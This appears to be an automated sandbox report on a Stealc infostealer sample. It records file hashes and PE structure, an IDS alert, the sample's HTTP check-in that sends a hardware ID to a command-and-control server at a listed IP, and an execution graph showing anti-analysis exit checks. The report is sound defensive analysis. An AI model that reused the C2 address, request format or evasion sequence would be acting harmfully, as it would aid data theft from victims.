                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.947218787911007
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:1'865'728 bytes
                                    MD5:a2d11b8a418d4d4f4653ffd4af70d5c7
                                    SHA1:f3067cf41aa873f0a0b363641f7be52f3497ab4b
                                    SHA256:de03784bad73bf146aef041c6d82e2f0e519688bcc6230f4cf88272b24b2a328
                                    SHA512:54f5734013bb434ca0920bf48122465f3f5a7b86c56854c462ec7ac18faa6cf05478c89f6636790b7e492f7ddab8222a8b280552b0db2918376f3166821daa29
                                    SSDEEP:49152:UOuNgGuyWHu49k2mPp6/on9XzsBC9faS2kwcJ8L3CA:UOcgG1WO4k2IIQ9XzNXvw8oS
                                    TLSH:4C8533BC85116009E04526F6A45B2BCCBE3C7B96A5E6CD8E4DC0F37C957BB16262FC24
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........

                                    File Icon

                                    Icon Hash:90cececece8e8eb0

                                    Static PE Info

                                    General

                                    Entrypoint:0xaa6000
                                    Entrypoint Section:.taggant
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007F228CB0303Ah
                                    orps xmm3, dqword ptr [eax+eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    jmp 00007F228CB05035h
                                    add byte ptr [edx], al
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], bl
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    or al, 80h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add cl, byte ptr [edx]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add ecx, dword ptr [edx]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax+00000000h], eax
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    or ecx, dword ptr [edx]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    inc eax
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], cl
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add cl, byte ptr [edx]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    xor byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    aas
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [edx], ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [edi], al
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Rich Headers

                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x25b0000x2280066625af1cc76d6e618788137abbcdd45unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x25e0000x2a50000x200f3d595d52a490bb533ddc3113fe4e6f2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    pbupcvvt0x5030000x1a20000x1a1400097cfcd0c486aab2ee7fb1781e615196False0.9950165471464949data7.9539107062128656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    eseqydfj0x6a50000x10000x600242e8eb803178e7d65a1ae3cc082d0f4False0.60546875data5.158732976472675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0x6a60000x30000x22000c228082a24e16240896fa6a2cb44ed3False0.05974264705882353DOS executable (COM)0.6906900422691058IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Imports

                                    DLLImport
                                    kernel32.dlllstrcpy

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-27T01:47:07.638757+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 27, 2024 01:47:06.423566103 CEST4973080192.168.2.4185.215.113.206
                                    Oct 27, 2024 01:47:06.429208994 CEST8049730185.215.113.206192.168.2.4
                                    Oct 27, 2024 01:47:06.429330111 CEST4973080192.168.2.4185.215.113.206
                                    Oct 27, 2024 01:47:06.429724932 CEST4973080192.168.2.4185.215.113.206
                                    Oct 27, 2024 01:47:06.435046911 CEST8049730185.215.113.206192.168.2.4
                                    Oct 27, 2024 01:47:07.345360041 CEST8049730185.215.113.206192.168.2.4
                                    Oct 27, 2024 01:47:07.345551968 CEST4973080192.168.2.4185.215.113.206
                                    Oct 27, 2024 01:47:07.348097086 CEST4973080192.168.2.4185.215.113.206
                                    Oct 27, 2024 01:47:07.353554010 CEST8049730185.215.113.206192.168.2.4
                                    Oct 27, 2024 01:47:07.638669968 CEST8049730185.215.113.206192.168.2.4
                                    Oct 27, 2024 01:47:07.638756990 CEST4973080192.168.2.4185.215.113.206
                                    Oct 27, 2024 01:47:10.678854942 CEST4973080192.168.2.4185.215.113.206

                                    HTTP Request Dependency Graph

                                    • 185.215.113.206

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730185.215.113.206807284C:\Users\user\Desktop\file.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 27, 2024 01:47:06.429724932 CEST90OUTGET / HTTP/1.1
                                    Host: 185.215.113.206
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Oct 27, 2024 01:47:07.345360041 CEST203INHTTP/1.1 200 OK
                                    Date: Sat, 26 Oct 2024 23:47:07 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Oct 27, 2024 01:47:07.348097086 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF
                                    Host: 185.215.113.206
                                    Content-Length: 210
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 37 39 33 33 44 45 31 46 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a
                                    Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="hwid"9A7933DE1F39786254513------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build"puma------EBKKKEGIDBGHIDGDHDBF--
                                    Oct 27, 2024 01:47:07.638669968 CEST210INHTTP/1.1 200 OK
                                    Date: Sat, 26 Oct 2024 23:47:07 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s=


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:19:47:03
                                    Start date:26/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0x520000
                                    File size:1'865'728 bytes
                                    MD5 hash:A2D11B8A418D4D4F4653FFD4AF70D5C7
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1723267854.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:8.6%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:9.7%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:25
                                      execution_graph 13052 5369f0 13097 522260 13052->13097 13076 536a64 13077 53a9b0 4 API calls 13076->13077 13078 536a6b 13077->13078 13079 53a9b0 4 API calls 13078->13079 13080 536a72 13079->13080 13081 53a9b0 4 API calls 13080->13081 13082 536a79 13081->13082 13083 53a9b0 4 API calls 13082->13083 13084 536a80 13083->13084 13249 53a8a0 13084->13249 13086 536b0c 13253 536920 GetSystemTime 13086->13253 13087 536a89 13087->13086 13089 536ac2 OpenEventA 13087->13089 13091 536af5 CloseHandle Sleep 13089->13091 13092 536ad9 13089->13092 13095 536b0a 13091->13095 13096 536ae1 CreateEventA 13092->13096 13095->13087 13096->13086 13450 5245c0 13097->13450 13099 522274 13100 5245c0 2 API calls 13099->13100 13101 52228d 13100->13101 13102 5245c0 2 API calls 13101->13102 13103 5222a6 13102->13103 13104 5245c0 2 API calls 13103->13104 13105 5222bf 13104->13105 13106 5245c0 2 API calls 13105->13106 13107 5222d8 13106->13107 13108 5245c0 2 API calls 13107->13108 13109 5222f1 13108->13109 13110 5245c0 2 API calls 13109->13110 13111 52230a 13110->13111 13112 5245c0 2 API calls 13111->13112 13113 522323 13112->13113 13114 5245c0 2 API calls 13113->13114 13115 52233c 13114->13115 13116 5245c0 2 API calls 13115->13116 13117 522355 13116->13117 13118 5245c0 2 API calls 13117->13118 13119 52236e 13118->13119 13120 5245c0 2 API calls 13119->13120 13121 522387 13120->13121 13122 5245c0 2 API calls 13121->13122 13123 5223a0 13122->13123 13124 5245c0 2 API calls 13123->13124 13125 5223b9 13124->13125 13126 5245c0 2 API calls 13125->13126 13127 5223d2 13126->13127 13128 5245c0 2 API calls 13127->13128 13129 5223eb 13128->13129 13130 5245c0 2 API calls 13129->13130 13131 522404 13130->13131 13132 5245c0 2 API calls 13131->13132 13133 52241d 13132->13133 13134 5245c0 2 API calls 13133->13134 13135 522436 13134->13135 13136 5245c0 2 API calls 13135->13136 13137 52244f 13136->13137 13138 5245c0 2 API calls 13137->13138 13139 522468 13138->13139 13140 5245c0 2 API calls 13139->13140 13141 522481 13140->13141 13142 5245c0 2 API calls 13141->13142 13143 52249a 13142->13143 13144 5245c0 2 API calls 13143->13144 13145 5224b3 13144->13145 13146 5245c0 2 API calls 13145->13146 13147 5224cc 13146->13147 13148 5245c0 2 API calls 13147->13148 13149 5224e5 13148->13149 13150 5245c0 2 API calls 13149->13150 13151 5224fe 13150->13151 13152 5245c0 2 API calls 13151->13152 13153 522517 13152->13153 13154 5245c0 2 API calls 13153->13154 13155 522530 13154->13155 13156 5245c0 2 API calls 13155->13156 13157 522549 13156->13157 13158 5245c0 2 API calls 13157->13158 13159 522562 13158->13159 13160 5245c0 2 API calls 13159->13160 13161 52257b 13160->13161 13162 5245c0 2 API calls 13161->13162 13163 522594 13162->13163 13164 5245c0 2 API calls 13163->13164 13165 5225ad 13164->13165 13166 5245c0 2 API calls 13165->13166 13167 5225c6 13166->13167 13168 5245c0 2 API calls 13167->13168 13169 5225df 13168->13169 13170 5245c0 2 API calls 13169->13170 13171 5225f8 13170->13171 13172 5245c0 2 API calls 13171->13172 13173 522611 13172->13173 13174 5245c0 2 API calls 13173->13174 13175 52262a 13174->13175 13176 5245c0 2 API calls 13175->13176 13177 522643 13176->13177 13178 5245c0 2 API calls 13177->13178 13179 52265c 13178->13179 13180 5245c0 2 API calls 13179->13180 13181 522675 13180->13181 13182 5245c0 2 API calls 13181->13182 13183 52268e 13182->13183 13184 539860 13183->13184 13455 539750 GetPEB 13184->13455 13186 539868 13187 539a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13186->13187 13188 53987a 13186->13188 13189 539af4 GetProcAddress 13187->13189 13190 539b0d 13187->13190 13193 53988c 21 API calls 13188->13193 13189->13190 13191 539b46 13190->13191 13192 539b16 GetProcAddress GetProcAddress 13190->13192 13194 539b68 13191->13194 13195 539b4f GetProcAddress 13191->13195 13192->13191 13193->13187 13196 539b71 GetProcAddress 13194->13196 13197 539b89 13194->13197 13195->13194 13196->13197 13198 539b92 GetProcAddress GetProcAddress 13197->13198 13199 536a00 13197->13199 13198->13199 13200 53a740 13199->13200 13201 53a750 13200->13201 13202 536a0d 13201->13202 13203 53a77e lstrcpy 13201->13203 13204 5211d0 13202->13204 13203->13202 13205 5211e8 13204->13205 13206 521217 13205->13206 13207 52120f ExitProcess 13205->13207 13208 521160 GetSystemInfo 13206->13208 13209 521184 13208->13209 13210 52117c ExitProcess 13208->13210 13211 521110 GetCurrentProcess VirtualAllocExNuma 13209->13211 13212 521141 ExitProcess 13211->13212 13213 521149 13211->13213 13456 5210a0 VirtualAlloc 13213->13456 13216 521220 13460 5389b0 13216->13460 13219 521249 __aulldiv 13220 52129a 13219->13220 13221 521292 ExitProcess 13219->13221 13222 536770 GetUserDefaultLangID 13220->13222 13223 5367d3 13222->13223 13224 536792 13222->13224 13230 521190 13223->13230 13224->13223 13225 5367a3 ExitProcess 13224->13225 13226 5367c1 ExitProcess 13224->13226 13227 5367b7 ExitProcess 13224->13227 13228 5367cb ExitProcess 13224->13228 13229 5367ad ExitProcess 13224->13229 13231 5378e0 3 API calls 13230->13231 13232 52119e 13231->13232 13233 5211cc 13232->13233 13234 537850 3 API calls 13232->13234 13237 537850 GetProcessHeap RtlAllocateHeap GetUserNameA 13233->13237 13235 5211b7 13234->13235 13235->13233 13236 5211c4 ExitProcess 13235->13236 13238 536a30 13237->13238 13239 5378e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13238->13239 13240 536a43 13239->13240 13241 53a9b0 13240->13241 13462 53a710 13241->13462 13243 53a9c1 lstrlen 13245 53a9e0 13243->13245 13244 53aa18 13463 53a7a0 13244->13463 13245->13244 13247 53a9fa lstrcpy lstrcat 13245->13247 13247->13244 13248 53aa24 13248->13076 13250 53a8bb 13249->13250 13251 53a90b 13250->13251 13252 53a8f9 lstrcpy 13250->13252 13251->13087 13252->13251 13467 536820 13253->13467 13255 53698e 13256 536998 sscanf 13255->13256 13496 53a800 13256->13496 13258 5369aa SystemTimeToFileTime SystemTimeToFileTime 13259 5369e0 13258->13259 13260 5369ce 13258->13260 13262 535b10 13259->13262 13260->13259 13261 5369d8 ExitProcess 13260->13261 13263 535b1d 13262->13263 13264 53a740 lstrcpy 13263->13264 13265 535b2e 13264->13265 13498 53a820 lstrlen 13265->13498 13268 53a820 2 API calls 13269 535b64 13268->13269 13270 53a820 2 API calls 13269->13270 13271 535b74 13270->13271 13502 536430 13271->13502 13274 53a820 2 API calls 13275 535b93 13274->13275 13276 53a820 2 API calls 13275->13276 13277 535ba0 13276->13277 13278 53a820 2 API calls 13277->13278 13279 535bad 13278->13279 13280 53a820 2 API calls 13279->13280 13281 535bf9 13280->13281 13511 5226a0 13281->13511 13289 535cc3 13290 536430 lstrcpy 13289->13290 13291 535cd5 13290->13291 13292 53a7a0 lstrcpy 13291->13292 13293 535cf2 13292->13293 13294 53a9b0 4 API calls 13293->13294 13295 535d0a 13294->13295 13296 53a8a0 lstrcpy 13295->13296 13297 535d16 13296->13297 13298 53a9b0 4 API calls 13297->13298 13299 535d3a 13298->13299 13300 53a8a0 lstrcpy 13299->13300 13301 535d46 13300->13301 13302 53a9b0 4 API calls 13301->13302 13303 535d6a 13302->13303 13304 53a8a0 lstrcpy 13303->13304 13305 535d76 13304->13305 13306 53a740 lstrcpy 13305->13306 13307 535d9e 13306->13307 14237 537500 GetWindowsDirectoryA 13307->14237 13310 53a7a0 lstrcpy 13311 535db8 13310->13311 14247 524880 13311->14247 13313 535dbe 14392 5317a0 13313->14392 13315 535dc6 13316 53a740 lstrcpy 13315->13316 13317 535de9 13316->13317 13318 521590 lstrcpy 13317->13318 13319 535dfd 13318->13319 14408 525960 13319->14408 13321 535e03 14552 531050 13321->14552 13323 535e0e 13324 53a740 lstrcpy 13323->13324 13325 535e32 13324->13325 13326 521590 lstrcpy 13325->13326 13327 535e46 13326->13327 13328 525960 34 API calls 13327->13328 13329 535e4c 13328->13329 14556 530d90 13329->14556 13331 535e57 13332 53a740 lstrcpy 13331->13332 13333 535e79 13332->13333 13334 521590 lstrcpy 13333->13334 13335 535e8d 13334->13335 13336 525960 34 API calls 13335->13336 13337 535e93 13336->13337 14563 530f40 13337->14563 13339 535e9e 13340 521590 lstrcpy 13339->13340 13341 535eb5 13340->13341 14568 531a10 13341->14568 13343 535eba 13344 53a740 lstrcpy 13343->13344 13345 535ed6 13344->13345 14912 524fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13345->14912 13347 535edb 13348 521590 lstrcpy 13347->13348 13349 535f5b 13348->13349 14919 530740 13349->14919 13351 535f60 13352 53a740 lstrcpy 13351->13352 13353 535f86 13352->13353 13354 521590 lstrcpy 13353->13354 13355 535f9a 13354->13355 13356 525960 34 API calls 13355->13356 13357 535fa0 13356->13357 13451 5245d1 RtlAllocateHeap 13450->13451 13454 524621 VirtualProtect 13451->13454 13454->13099 13455->13186 13458 5210c2 ctype 13456->13458 13457 5210fd 13457->13216 13458->13457 13459 5210e2 VirtualFree 13458->13459 13459->13457 13461 521233 GlobalMemoryStatusEx 13460->13461 13461->13219 13462->13243 13464 53a7c2 13463->13464 13465 53a7ec 13464->13465 13466 53a7da lstrcpy 13464->13466 13465->13248 13466->13465 13468 53a740 lstrcpy 13467->13468 13469 536833 13468->13469 13470 53a9b0 4 API calls 13469->13470 13471 536845 13470->13471 13472 53a8a0 lstrcpy 13471->13472 13473 53684e 13472->13473 13474 53a9b0 4 API calls 13473->13474 13475 536867 13474->13475 13476 53a8a0 lstrcpy 13475->13476 13477 536870 13476->13477 13478 53a9b0 4 API calls 13477->13478 13479 53688a 13478->13479 13480 53a8a0 lstrcpy 13479->13480 13481 536893 13480->13481 13482 53a9b0 4 API calls 13481->13482 13483 5368ac 13482->13483 13484 53a8a0 lstrcpy 13483->13484 13485 5368b5 13484->13485 13486 53a9b0 4 API calls 13485->13486 13487 5368cf 13486->13487 13488 53a8a0 lstrcpy 13487->13488 13489 5368d8 13488->13489 13490 53a9b0 4 API calls 13489->13490 13491 5368f3 13490->13491 13492 53a8a0 lstrcpy 13491->13492 13493 5368fc 13492->13493 13494 53a7a0 lstrcpy 13493->13494 13495 536910 13494->13495 13495->13255 13497 53a812 13496->13497 13497->13258 13499 53a83f 13498->13499 13500 535b54 13499->13500 13501 53a87b lstrcpy 13499->13501 13500->13268 13501->13500 13503 53a8a0 lstrcpy 13502->13503 13504 536443 13503->13504 13505 53a8a0 lstrcpy 13504->13505 13506 536455 13505->13506 13507 53a8a0 lstrcpy 13506->13507 13508 536467 13507->13508 13509 53a8a0 lstrcpy 13508->13509 13510 535b86 13509->13510 13510->13274 13512 5245c0 2 API calls 13511->13512 13513 5226b4 13512->13513 13514 5245c0 2 API calls 13513->13514 13515 5226d7 13514->13515 13516 5245c0 2 API calls 13515->13516 13517 5226f0 13516->13517 13518 5245c0 2 API calls 13517->13518 13519 522709 13518->13519 13520 5245c0 2 API calls 13519->13520 13521 522736 13520->13521 13522 5245c0 2 API calls 13521->13522 13523 52274f 13522->13523 13524 5245c0 2 API calls 13523->13524 13525 522768 13524->13525 13526 5245c0 2 API calls 13525->13526 13527 522795 13526->13527 13528 5245c0 2 API calls 13527->13528 13529 5227ae 13528->13529 13530 5245c0 2 API calls 13529->13530 13531 5227c7 13530->13531 13532 5245c0 2 API calls 13531->13532 13533 5227e0 13532->13533 13534 5245c0 2 API calls 13533->13534 13535 5227f9 13534->13535 13536 5245c0 2 API calls 13535->13536 13537 522812 13536->13537 13538 5245c0 2 API calls 13537->13538 13539 52282b 13538->13539 13540 5245c0 2 API calls 13539->13540 13541 522844 13540->13541 13542 5245c0 2 API calls 13541->13542 13543 52285d 13542->13543 13544 5245c0 2 API calls 13543->13544 13545 522876 13544->13545 13546 5245c0 2 API calls 13545->13546 13547 52288f 13546->13547 13548 5245c0 2 API calls 13547->13548 13549 5228a8 13548->13549 13550 5245c0 2 API calls 13549->13550 13551 5228c1 13550->13551 13552 5245c0 2 API calls 13551->13552 13553 5228da 13552->13553 13554 5245c0 2 API calls 13553->13554 13555 5228f3 13554->13555 13556 5245c0 2 API calls 13555->13556 13557 52290c 13556->13557 13558 5245c0 2 API calls 13557->13558 13559 522925 13558->13559 13560 5245c0 2 API calls 13559->13560 13561 52293e 13560->13561 13562 5245c0 2 API calls 13561->13562 13563 522957 13562->13563 13564 5245c0 2 API calls 13563->13564 13565 522970 13564->13565 13566 5245c0 2 API calls 13565->13566 13567 522989 13566->13567 13568 5245c0 2 API calls 13567->13568 13569 5229a2 13568->13569 13570 5245c0 2 API calls 13569->13570 13571 5229bb 13570->13571 13572 5245c0 2 API calls 13571->13572 13573 5229d4 13572->13573 13574 5245c0 2 API calls 13573->13574 13575 5229ed 13574->13575 13576 5245c0 2 API calls 13575->13576 13577 522a06 13576->13577 13578 5245c0 2 API calls 13577->13578 13579 522a1f 13578->13579 13580 5245c0 2 API calls 13579->13580 13581 522a38 13580->13581 13582 5245c0 2 API calls 13581->13582 13583 522a51 13582->13583 13584 5245c0 2 API calls 13583->13584 13585 522a6a 13584->13585 13586 5245c0 2 API calls 13585->13586 13587 522a83 13586->13587 13588 5245c0 2 API calls 13587->13588 13589 522a9c 13588->13589 13590 5245c0 2 API calls 13589->13590 13591 522ab5 13590->13591 13592 5245c0 2 API calls 13591->13592 13593 522ace 13592->13593 13594 5245c0 2 API calls 13593->13594 13595 522ae7 13594->13595 13596 5245c0 2 API calls 13595->13596 13597 522b00 13596->13597 13598 5245c0 2 API calls 13597->13598 13599 522b19 13598->13599 13600 5245c0 2 API calls 13599->13600 13601 522b32 13600->13601 13602 5245c0 2 API calls 13601->13602 13603 522b4b 13602->13603 13604 5245c0 2 API calls 13603->13604 13605 522b64 13604->13605 13606 5245c0 2 API calls 13605->13606 13607 522b7d 13606->13607 13608 5245c0 2 API calls 13607->13608 13609 522b96 13608->13609 13610 5245c0 2 API calls 13609->13610 13611 522baf 13610->13611 13612 5245c0 2 API calls 13611->13612 13613 522bc8 13612->13613 13614 5245c0 2 API calls 13613->13614 13615 522be1 13614->13615 13616 5245c0 2 API calls 13615->13616 13617 522bfa 13616->13617 13618 5245c0 2 API calls 13617->13618 13619 522c13 13618->13619 13620 5245c0 2 API calls 13619->13620 13621 522c2c 13620->13621 13622 5245c0 2 API calls 13621->13622 13623 522c45 13622->13623 13624 5245c0 2 API calls 13623->13624 13625 522c5e 13624->13625 13626 5245c0 2 API calls 13625->13626 13627 522c77 13626->13627 13628 5245c0 2 API calls 13627->13628 13629 522c90 13628->13629 13630 5245c0 2 API calls 13629->13630 13631 522ca9 13630->13631 13632 5245c0 2 API calls 13631->13632 13633 522cc2 13632->13633 13634 5245c0 2 API calls 13633->13634 13635 522cdb 13634->13635 13636 5245c0 2 API calls 13635->13636 13637 522cf4 13636->13637 13638 5245c0 2 API calls 13637->13638 13639 522d0d 13638->13639 13640 5245c0 2 API calls 13639->13640 13641 522d26 13640->13641 13642 5245c0 2 API calls 13641->13642 13643 522d3f 13642->13643 13644 5245c0 2 API calls 13643->13644 13645 522d58 13644->13645 13646 5245c0 2 API calls 13645->13646 13647 522d71 13646->13647 13648 5245c0 2 API calls 13647->13648 13649 522d8a 13648->13649 13650 5245c0 2 API calls 13649->13650 13651 522da3 13650->13651 13652 5245c0 2 API calls 13651->13652 13653 522dbc 13652->13653 13654 5245c0 2 API calls 13653->13654 13655 522dd5 13654->13655 13656 5245c0 2 API calls 13655->13656 13657 522dee 13656->13657 13658 5245c0 2 API calls 13657->13658 13659 522e07 13658->13659 13660 5245c0 2 API calls 13659->13660 13661 522e20 